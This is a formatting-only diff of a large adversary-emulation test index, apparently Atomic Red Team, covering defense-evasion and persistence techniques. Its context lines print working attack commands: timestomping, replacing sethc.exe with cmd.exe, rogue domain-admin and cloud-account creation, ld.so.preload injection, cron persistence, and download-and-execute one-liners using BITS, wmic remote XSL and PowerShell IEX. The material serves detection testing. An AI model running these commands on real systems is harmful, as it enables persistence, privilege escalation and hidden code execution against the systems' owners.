@@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - ' +' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. - ' +' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe - ' +' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename - ' +' supported_platforms: - macos executor: 
@@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. - ' +' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system 
@@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} - ' +' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} - ' +' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 
@@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 
@@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" - ' +' - description: 'kxwn.lock must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File - ' +' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) - ' +' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r - ' +' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 
@@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s - ' +' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 - ' +' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) - ' +' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 - ' +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1220: 
@@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) - ' +' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) - ' +' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 
@@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. - ' +' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) - ' +' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" - ' +' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" - ' +' name: command_prompt persistence: T1546.008: 
@@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory - ' +' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False - ' +' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - ' +' supported_platforms: - iaas:aws input_arguments: 
@@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test - ' +' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" - ' +' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic - ' +' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds 
@@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: 
@@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. - ' +' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time - ' +' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: 'cat ~/.aws/credentials | grep "default" - ' +' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: 'aws iam create-user --user-name #{username} - ' +' cleanup_command: 'aws iam delete-user --user-name #{username} - ' +' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: 
@@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: 
@@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain - ' +' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User - ' +' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" - ' +' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String 